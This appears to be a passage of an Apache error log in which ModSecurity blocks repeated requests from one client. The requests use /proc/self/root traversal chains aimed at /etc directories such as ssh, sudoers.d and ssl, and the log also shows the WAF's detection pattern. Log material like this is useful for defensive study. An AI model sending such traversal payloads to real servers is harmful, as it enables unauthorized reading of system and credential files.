"PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnAMdf6f5d65gmYZTRagAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:08.400046 2026] [mime_magic:error] [pid 17653:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:36538] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:08.843898 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:36548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnAOw_le52K8_3pV3bfQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:09.748394 2026] [mime_magic:error] [pid 30077:tid 140411548894976] (70014)End of file found: [client 57.141.18.14:39252] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:22:10.127979 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:32848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnAkzinOy1jxa1j4cQ8AAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:11.461636 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:32856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnA8df6f5d65gmYZTRbAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:12.894895 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:32866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnBPu8EFLIOrSqIpsAWwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:14.286466 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:32882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnBkzinOy1jxa1j4cQ-QAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:15.581270 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:32884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnB_u8EFLIOrSqIpsAXgAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:16.886836 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:32896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnCNY0UrI5A3LftIyiYwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:18.215208 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:32898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnCgkwaGbbGflqUZAL9QAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:19.499182 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:58156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnC0zinOy1jxa1j4cRAwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:20.843161 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:58158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnDNY0UrI5A3LftIyiZgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:22.114960 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:58170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnDuoXxyEfFpUF8f9pzAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:23.469227 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:58174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnD-w_le52K8_3pV3bhQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:26.054438 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:58186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnEOyqAr6etmhZHNq7XwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:27.354777 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:58190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnE0zinOy1jxa1j4cRDQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:28.675938 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:58192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnFNY0UrI5A3LftIyiagAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:30.008294 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:53808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnFgkwaGbbGflqUZAL-AAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:31.378777 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:53818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnF-yqAr6etmhZHNq7YgAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:32.691409 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:53826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnGNa6ubjKNq_cu4aVNgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:34.004647 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:53832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnGimAPhZkrhU8w4lofwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:35.327444 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:53848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnG-yqAr6etmhZHNq7YwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
